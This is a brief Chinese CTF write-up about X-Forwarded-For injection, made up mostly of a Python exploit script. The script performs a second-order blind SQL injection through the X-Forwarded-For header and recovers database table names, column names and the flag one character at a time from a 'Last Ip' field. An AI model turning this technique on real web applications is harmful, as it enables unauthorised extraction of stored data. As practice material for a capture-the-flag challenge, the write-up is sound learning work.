考点

  1. X-Forwarded注入

    解题

    题目不难需要仔细观察
    在题目源码中有图片.png直接给exp了 看了一下和wp的方法不太一样 但是原理相同 更快速一点!
    1. import requests
    2. import re
    3. url = "http://node4.buuoj.cn:27079/?url=http://127.0.0.1/"
    4. #爆表名
    5. #xForwarded = "0'+ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='F4l9_D4t4B45e'),{},1))+'0"
    6. #F4l9_t4b1e
    7. #xForwarded = "0'+ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='F4l9_D4t4B45e'),{},1))+'0"
    8. #F4l9_C01uMn
    9. xForwarded = "0'+ascii(substr((select group_concat(F4l9_C01uMn) from F4l9_D4t4B45e.F4l9_t4b1e),{},1))+'0"
    10. flag=''
    11. proxies = {
    12.  'http': 'http://127.0.0.1:8080',
    13.  'https': 'https://127.0.0.1:8080'
    14.  }
    15. for i in range(1, 100):
    16.  head = {
    17.      "GET" : "/ HTTP/1.1",
    18.      "Cookie" : "track_uuid=3817ca8d-1911-4281-b432-10a091e15940",
    19.      'X-Forwarded-For': xForwarded.format(i)
    20.      }
    21.  r = requests.get(url, headers=head)
    22.  head["X-Forwarded-For"] = "penson"
    23.  r = requests.get(url,headers=head)
    24.  r = requests.get(url,headers=head)
    25.  f = re.search('Last Ip:\s(\d+)',r.text)
    26.  flag = flag+chr(int(f.group(1)))
    27.  print(flag)